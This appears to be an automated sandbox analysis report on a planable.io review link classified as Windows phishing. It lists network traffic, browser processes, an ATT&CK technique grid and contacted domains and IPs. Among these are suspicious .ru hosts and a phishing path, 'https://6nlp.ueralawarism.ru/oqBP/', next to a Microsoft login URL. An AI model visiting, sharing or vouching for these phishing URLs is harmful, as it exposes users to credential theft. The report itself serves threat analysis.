        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
        Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
        Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
        Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
        Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49724 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49725 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:50063 version: TLS 1.2
        Source: classification engineClassification label: mal52.phis.win@27/167@234/954
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1904,i,6481929983807619735,17660691006616261222,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://app.planable.io/review/0OPaw36t6M_k"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1904,i,6481929983807619735,17660691006616261222,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        Browser Extensions
        1
        Process Injection
        1
        Masquerading
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Registry Run Keys / Startup Folder
        1
        Registry Run Keys / Startup Folder
        1
        Process Injection
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        https://app.planable.io/review/0OPaw36t6M_k0%Avira URL Cloudsafe
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        prod-default.lb.logrocket.network
        104.198.23.205
        truefalse
          unknown
          cdn.logrocket.com
          172.67.40.17
          truefalse
            high
            a8d126e28763e40efbb5f026a7d57f8b-8265cdba043f0b14.elb.us-east-1.amazonaws.com
            54.227.203.3
            truefalse
              unknown
              stats.g.doubleclick.net
              142.251.173.156
              truefalse
                high
                app.satismeter.com
                104.18.3.19
                truefalse
                  unknown
                  cdnjs.cloudflare.com
                  104.17.25.14
                  truefalse
                    high
                    cname.instatus.com
                    76.76.21.142
                    truefalse
                      unknown
                      6nlp.ueralawarism.ru
                      188.114.97.3
                      truefalse
                        unknown
                        stripe.com
                        52.30.58.64
                        truefalse
                          high
                          sni1gl.wpc.omegacdn.net
                          152.199.21.175
                          truefalse
                            high
                            www.google.com
                            142.250.186.36
                            truefalse
                              high
                              api.segment.io
                              35.155.246.37
                              truefalse
                                high
                                cdn.mxpnl.com
                                35.186.235.23
                                truefalse
                                  high
                                  d2ycxbs0cq3yaz.cloudfront.net
                                  13.32.121.12
                                  truefalse
                                    unknown
                                    js.intercomcdn.com
                                    18.245.46.55
                                    truefalse
                                      high
                                      star-mini.c10r.facebook.com
                                      157.240.252.35
                                      truefalse
                                        high
                                        api.instatus.com
                                        104.22.46.169
                                        truefalse
                                          high
                                          onesignal.com
                                          104.17.111.223
                                          truefalse
                                            high
                                            eu-west-1.galaxy-ingress.meteor.com
                                            18.200.141.250
                                            truefalse
                                              unknown
                                              plus.l.google.com
                                              216.58.206.78
                                              truefalse
                                                high
                                                api-js.mixpanel.com
                                                107.178.240.159
                                                truefalse
                                                  high
                                                  www.planable.io
                                                  172.66.43.101
                                                  truefalse
                                                    unknown
                                                    engine-us.montiapm.com
                                                    104.26.7.135
                                                    truefalse
                                                      high
                                                      split.map.fastly.net
                                                      151.101.131.9
                                                      truefalse
                                                        unknown
                                                        api-iam.intercom.io
                                                        3.222.155.205
                                                        truefalse
                                                          high
                                                          d13kcrsa1oavch.cloudfront.net
                                                          3.161.82.61
                                                          truefalse
                                                            unknown
                                                            stripecdn.map.fastly.net
                                                            151.101.192.176
                                                            truefalse
                                                              high
                                                              s3-w.us-east-1.amazonaws.com
                                                              52.217.197.209
                                                              truefalse
                                                                high
                                                                segment.planable.io
                                                                172.66.43.101
                                                                truefalse
                                                                  high
                                                                  googleads.g.doubleclick.net
                                                                  172.217.16.194
                                                                  truefalse
                                                                    high
                                                                    m.stripe.com
                                                                    54.190.90.128
                                                                    truefalse
                                                                      high
                                                                      1529036741.rsc.cdn77.org
                                                                      169.150.255.183
                                                                      truefalse
                                                                        unknown
                                                                        challenges.cloudflare.com
                                                                        104.18.94.41
                                                                        truefalse
                                                                          high
                                                                          td.doubleclick.net
                                                                          172.217.16.194
                                                                          truefalse
                                                                            high
                                                                            do9efv5u6nwa8.cloudfront.net
                                                                            18.66.137.147
                                                                            truefalse
                                                                              high
                                                                              d2dzu5rf27gdz3.cloudfront.net
                                                                              18.245.45.130
                                                                              truefalse
                                                                                high
                                                                                auth.split.io
                                                                                35.170.228.5
                                                                                truefalse
                                                                                  unknown
                                                                                  scontent.xx.fbcdn.net
                                                                                  157.240.253.1
                                                                                  truefalse
                                                                                    high
                                                                                    rum-static.pingdom.net
                                                                                    172.67.5.216
                                                                                    truefalse
                                                                                      high
                                                                                      code.jquery.com
                                                                                      151.101.2.137
                                                                                      truefalse
                                                                                        high
                                                                                        nexus-websocket-a.intercom.io
                                                                                        35.174.127.31
                                                                                        truefalse
                                                                                          high
                                                                                          a.nel.cloudflare.com
                                                                                          35.190.80.1
                                                                                          truefalse
                                                                                            high
                                                                                            widget.intercom.io
                                                                                            108.138.26.78
                                                                                            truefalse
                                                                                              high
                                                                                              sentry.io
                                                                                              35.186.247.156
                                                                                              truefalse
                                                                                                high
                                                                                                s-part-0017.t-0009.t-msedge.net
                                                                                                13.107.246.45
                                                                                                truefalse
                                                                                                  high
                                                                                                  ax-0001.ax-msedge.net
                                                                                                  150.171.28.10
                                                                                                  truefalse
                                                                                                    high
                                                                                                    attribution.planable.io
                                                                                                    216.239.32.21
                                                                                                    truefalse
                                                                                                      unknown
                                                                                                      r.stripe.com
                                                                                                      54.187.119.242
                                                                                                      truefalse
                                                                                                        high
                                                                                                        cdn.onesignal.com
                                                                                                        104.17.111.223
                                                                                                        truefalse
                                                                                                          high
                                                                                                          prod-dem-collector-elb-611025824.eu-west-1.elb.amazonaws.com
                                                                                                          34.240.224.120
                                                                                                          truefalse
                                                                                                            unknown
                                                                                                            dexeqbeb7giwr.cloudfront.net
                                                                                                            99.86.4.122
                                                                                                            truefalse
                                                                                                              high
                                                                                                              analytics.google.com
                                                                                                              172.217.16.206
                                                                                                              truefalse
                                                                                                                high
                                                                                                                babel.innertrends.com
                                                                                                                216.239.34.21
                                                                                                                truefalse
                                                                                                                  high
                                                                                                                  api.stripe.com
                                                                                                                  34.241.202.139
                                                                                                                  truefalse
                                                                                                                    high
                                                                                                                    fmvrvcbehzfgiwxdoam0usw9nl2bnpllzwu0umzhubb4cizjgwfoc.deryposi.ru
                                                                                                                    188.114.97.3
                                                                                                                    truefalse
                                                                                                                      unknown
                                                                                                                      ddv9nt6v6rf1j.cloudfront.net
                                                                                                                      18.245.86.106
                                                                                                                      truefalse
                                                                                                                        unknown
                                                                                                                        www.office.com
                                                                                                                        unknown
                                                                                                                        unknownfalse
                                                                                                                          high
                                                                                                                          app.planable.io
                                                                                                                          unknown
                                                                                                                          unknownfalse
                                                                                                                            high
                                                                                                                            aadcdn.msftauth.net
                                                                                                                            unknown
                                                                                                                            unknownfalse
                                                                                                                              high
                                                                                                                              connect.facebook.net
                                                                                                                              unknown
                                                                                                                              unknownfalse
                                                                                                                                high
                                                                                                                                px.ads.linkedin.com
                                                                                                                                unknown
                                                                                                                                unknownfalse
                                                                                                                                  high
                                                                                                                                  logs.mezmo.com
                                                                                                                                  unknown
                                                                                                                                  unknownfalse
                                                                                                                                    unknown
                                                                                                                                    js.stripe.com
                                                                                                                                    unknown
                                                                                                                                    unknownfalse
                                                                                                                                      high
                                                                                                                                      m.stripe.network
                                                                                                                                      unknown
                                                                                                                                      unknownfalse
                                                                                                                                        high
                                                                                                                                        innertrends.s3.amazonaws.com
                                                                                                                                        unknown
                                                                                                                                        unknownfalse
                                                                                                                                          high
                                                                                                                                          cdn.firstpromoter.com
                                                                                                                                          unknown
                                                                                                                                          unknownfalse
                                                                                                                                            high
                                                                                                                                            r.logrocket.io
                                                                                                                                            unknown
                                                                                                                                            unknownfalse
                                                                                                                                              high
                                                                                                                                              status.planable.io
                                                                                                                                              unknown
                                                                                                                                              unknownfalse
                                                                                                                                                unknown
                                                                                                                                                www.facebook.com
                                                                                                                                                unknown
                                                                                                                                                unknownfalse
                                                                                                                                                  high
                                                                                                                                                  sdk.split.io
                                                                                                                                                  unknown
                                                                                                                                                  unknownfalse
                                                                                                                                                    high
                                                                                                                                                    www.linkedin.com
                                                                                                                                                    unknown
                                                                                                                                                    unknownfalse
                                                                                                                                                      high
                                                                                                                                                      rum-collector-2.pingdom.net
                                                                                                                                                      unknown
                                                                                                                                                      unknownfalse
                                                                                                                                                        high
                                                                                                                                                        cdn.headwayapp.co
                                                                                                                                                        unknown
                                                                                                                                                        unknownfalse
                                                                                                                                                          high
                                                                                                                                                          inner.planable.io
                                                                                                                                                          unknown
                                                                                                                                                          unknownfalse
                                                                                                                                                            high
                                                                                                                                                            snap.licdn.com
                                                                                                                                                            unknown
                                                                                                                                                            unknownfalse
                                                                                                                                                              high
                                                                                                                                                              analytics.tiktok.com
                                                                                                                                                              unknown
                                                                                                                                                              unknownfalse
                                                                                                                                                                high
                                                                                                                                                                login.microsoftonline.com
                                                                                                                                                                unknown
                                                                                                                                                                unknownfalse
                                                                                                                                                                  high
                                                                                                                                                                  streaming.split.io
                                                                                                                                                                  unknown
                                                                                                                                                                  unknownfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    apis.google.com
                                                                                                                                                                    unknown
                                                                                                                                                                    unknownfalse
                                                                                                                                                                      high
                                                                                                                                                                      NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                      https://6nlp.ueralawarism.ru/oqBP/false
                                                                                                                                                                        unknown
                                                                                                                                                                        https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721050692742532.OTcxODRiZGQtMzU2Ni00MTNlLWFkNjktODlhY2U5NzNkNjc1NjkzMjdlOTAtNTMyMi00ZTk1LTkzYzctMWRiYzVkMjEyZGE5&ui_locales=en-US&mkt=en-US&client-request-id=299599de-c184-46d5-930e-be2c523b322d&state=O1o2q82cQuiQtSTRT2Lm35p08FvAP-fHVssuhRFiX7nC3kpTK63-TC6bi3bqTiPtiBTR-Qt9rJWGCLvi7JVvdF1Woaal4aKddlr-8riIVIhW0u10H-kkBAikCKkKQWim7eD6tJSkWnbcrbfm_qySYjWZHY8p3zHg0Wi_7tStHzZR_slKpV22OtTjkjkWY3bgzlsyE_CpAH_sTG-fLSYYHk8DARhAFsFSOyotzh8D0lVmu8i77Sg6g0kNy7QNi2S5wmNmkriv6KBYcHvwZ0V78g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://app.planable.io/review/0OPaw36t6M_ktrue
                                                                                                                                                                            unknown
                                                                                                                                                                            https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721050692742532.OTcxODRiZGQtMzU2Ni00MTNlLWFkNjktODlhY2U5NzNkNjc1NjkzMjdlOTAtNTMyMi00ZTk1LTkzYzctMWRiYzVkMjEyZGE5&ui_locales=en-US&mkt=en-US&client-request-id=299599de-c184-46d5-930e-be2c523b322d&state=O1o2q82cQuiQtSTRT2Lm35p08FvAP-fHVssuhRFiX7nC3kpTK63-TC6bi3bqTiPtiBTR-Qt9rJWGCLvi7JVvdF1Woaal4aKddlr-8riIVIhW0u10H-kkBAikCKkKQWim7eD6tJSkWnbcrbfm_qySYjWZHY8p3zHg0Wi_7tStHzZR_slKpV22OtTjkjkWY3bgzlsyE_CpAH_sTG-fLSYYHk8DARhAFsFSOyotzh8D0lVmu8i77Sg6g0kNy7QNi2S5wmNmkriv6KBYcHvwZ0V78g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                                                                                                                                                              unknown
                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                              13.107.246.45
                                                                                                                                                                              s-part-0017.t-0009.t-msedge.netUnited States
                                                                                                                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                              35.186.247.156
                                                                                                                                                                              sentry.ioUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              142.250.185.227
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              35.174.127.31
                                                                                                                                                                              nexus-websocket-a.intercom.ioUnited States
                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                              34.237.73.95
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                              18.200.141.250
                                                                                                                                                                              eu-west-1.galaxy-ingress.meteor.comUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              104.18.3.19
                                                                                                                                                                              app.satismeter.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              35.190.80.1
                                                                                                                                                                              a.nel.cloudflare.comUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              104.22.4.148
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              54.190.90.128
                                                                                                                                                                              m.stripe.comUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              35.155.246.37
                                                                                                                                                                              api.segment.ioUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              1.1.1.1
                                                                                                                                                                              unknownAustralia
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              142.250.185.110
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              216.58.206.42
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              172.67.5.216
                                                                                                                                                                              rum-static.pingdom.netUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              151.101.67.9
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                              172.67.37.209
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              239.255.255.250
                                                                                                                                                                              unknownReserved
                                                                                                                                                                              unknownunknownfalse
                                                                                                                                                                              142.250.185.195
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              108.138.26.78
                                                                                                                                                                              widget.intercom.ioUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              169.150.255.183
                                                                                                                                                                              1529036741.rsc.cdn77.orgUnited States
                                                                                                                                                                              2711SPIRITTEL-ASUSfalse
                                                                                                                                                                              151.101.192.176
                                                                                                                                                                              stripecdn.map.fastly.netUnited States
                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                              99.86.4.122
                                                                                                                                                                              dexeqbeb7giwr.cloudfront.netUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              172.66.43.101
                                                                                                                                                                              www.planable.ioUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              64.233.166.84
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              130.211.5.208
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              54.187.119.242
                                                                                                                                                                              r.stripe.comUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              54.203.25.147
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              157.240.252.35
                                                                                                                                                                              star-mini.c10r.facebook.comUnited States
                                                                                                                                                                              32934FACEBOOKUSfalse
                                                                                                                                                                              35.186.235.23
                                                                                                                                                                              cdn.mxpnl.comUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              172.67.40.17
                                                                                                                                                                              cdn.logrocket.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              3.161.82.61
                                                                                                                                                                              d13kcrsa1oavch.cloudfront.netUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              54.227.203.3
                                                                                                                                                                              a8d126e28763e40efbb5f026a7d57f8b-8265cdba043f0b14.elb.us-east-1.amazonaws.comUnited States
                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                              216.239.32.21
                                                                                                                                                                              attribution.planable.ioUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              34.212.6.252
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              52.3.58.56
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                              54.187.159.182
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              52.216.93.107
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              13.32.121.12
                                                                                                                                                                              d2ycxbs0cq3yaz.cloudfront.netUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              20.190.159.2
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                              142.250.185.174
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              18.245.45.83
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              157.240.253.1
                                                                                                                                                                              scontent.xx.fbcdn.netUnited States
                                                                                                                                                                              32934FACEBOOKUSfalse
                                                                                                                                                                              104.22.46.169
                                                                                                                                                                              api.instatus.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              2.20.245.76
                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                              188.114.96.3
                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              104.26.6.135
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              18.245.46.55
                                                                                                                                                                              js.intercomcdn.comUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              13.107.6.156
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                              104.17.111.223
                                                                                                                                                                              onesignal.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              54.80.201.22
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                              20.190.159.64
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                              2.20.245.81
                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                              18.66.137.43
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                                                                              104.198.23.205
                                                                                                                                                                              prod-default.lb.logrocket.networkUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              18.173.205.46
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                                                                              66.33.60.66
                                                                                                                                                                              unknownCanada
                                                                                                                                                                              13768COGECO-PEER1CAfalse
                                                                                                                                                                              142.251.173.156
                                                                                                                                                                              stats.g.doubleclick.netUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              108.138.26.124
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              104.124.11.217
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                              40.79.141.152
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                              18.245.45.130
                                                                                                                                                                              d2dzu5rf27gdz3.cloudfront.netUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              142.250.186.36
                                                                                                                                                                              www.google.comUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              76.76.21.142
                                                                                                                                                                              cname.instatus.comUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              104.18.95.41
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              18.245.86.106
                                                                                                                                                                              ddv9nt6v6rf1j.cloudfront.netUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              13.107.42.14
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                              188.114.97.3
                                                                                                                                                                              6nlp.ueralawarism.ruEuropean Union
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              52.217.197.209
                                                                                                                                                                              s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              44.197.221.236
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                              195.181.175.41
                                                                                                                                                                              unknownUnited Kingdom
                                                                                                                                                                              60068CDN77GBfalse
                                                                                                                                                                              142.250.186.100
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              172.217.16.194
                                                                                                                                                                              googleads.g.doubleclick.netUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              34.203.167.12
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              14618AMAZON-AESUSfalse
